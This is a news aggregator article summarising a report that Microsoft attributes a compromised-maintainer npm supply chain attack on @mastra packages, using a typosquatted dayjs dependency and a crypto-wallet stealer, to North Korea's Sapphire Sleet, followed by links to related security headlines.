Source linked

Sapphire Sleet's npm Hijack Hit 140 Packages, Targeted 166 Crypto Wallets

bleepingcomputer.com@deep_falcon4 hours ago·Cybersecurity·4 comments

Microsoft attributes the Mastra AI supply chain attack to North Korean state hackers, who used a typosquatted JavaScript library to drop cross-platform malware that exfiltrated credentials and crypto assets.

microsoftsapphire sleetnorth koreanpmsupply chain attackcryptocurrency theft

Sapphire Sleet compromised the npm maintainer account 'ehindero' and published malicious updates to over 140 packages in the @mastra scope. Microsoft linked this attack to the North Korean state group with high confidence, citing overlapping tradecraft and infrastructure from prior campaigns.

Typosquatted dayjs Dropped Cross-Platform Malware

The attackers injected a malicious dependency named "easy-day-js" - a typosquat of the widely used dayjs library. When any compromised package was installed, a postinstall hook executed an obfuscated dropper that disabled TLS certificate verification, contacted a command-and-control server, downloaded a second-stage payload, and ran it as a detached hidden process.

That second-stage payload was a cross-platform information stealer targeting Windows, Linux, and macOS. It collected host information, browser histories, installed applications, and running processes. Microsoft confirmed the malware checked for 166 cryptocurrency wallet browser extensions including MetaMask, Phantom, Coinbase Wallet, Binance Wallet, and TronLink.

Persistence That Ignores Your OS

Depending on the operating system, the malware used different persistence mechanisms: Windows Registry Run keys, macOS LaunchAgents, and Linux systemd services. Systems that reached the C2 infrastructure saw follow-on activity including a PowerShell backdoor previously tied to Sapphire Sleet, extra persistence, Microsoft Defender exclusions, and a malicious Windows service that granted SYSTEM privileges.

Microsoft noted that the PowerShell backdoor, tradecraft, and C2 infrastructure matched exactly what Sapphire Sleet used in earlier campaigns. The group also ran a separate npm supply chain attack against the Axios HTTP client in April 2026.

Why This Matters for Anyone Running npm

This was not a sophisticated 0-day exploit. It was a compromised maintainer account with publishing privileges, abusing the trust developers place in npm scoped packages. The typosquat approach - easy-day-js vs dayjs - shows the attackers counted on developers not reading the dependency tree closely. With 140+ packages poisoned, any CI/CD pipeline pulling a @mastra package in that window could be compromised.

Test every layer before attackers do. Security teams log 54% of successful attacks and alert on just 14%. This attack reinforces that npm supply chain integrity needs constant verification, not just a once-over audit.

Source: Microsoft links Mastra AI supply chain attack to North Korean hackers
Domain: bleepingcomputer.com

Read original source ->

External source stays available while the OJO article and comment thread stay local.

More in Cybersecurity

view topic
Ethereum's top sandwich bot lost $7.5 million to its own greed

An attacker tricked jaredfromsubway.eth into approving fake trades over weeks, then drained WETH, USDC, and USDT using the bot's own automated logic.

Mythos AI Pushes Smart Contract Audit Costs Toward Zero, Reshaping Liability

AI-powered security tool Mythos makes basic audits nearly free, but experts warn it can't stop social engineering or key theft.

AryStinger Turns 4,000 D-Link Routers Into Distributed Proxy Army

Qianxin's XLab uncovered a botnet exploiting end-of-life D-Link routers to perform parallel scanning, DNS hijacking, and traffic sniffing.

Prinz Eugen ransomware hits your newest files first, skips ransom notes

ThreatDown analysis reveals a Go-based ransomware that prioritizes recently modified files, uses ChaCha20-Poly1305, and deletes itself after encryption with no ransom note left behind.

Comments load interactively on the live page.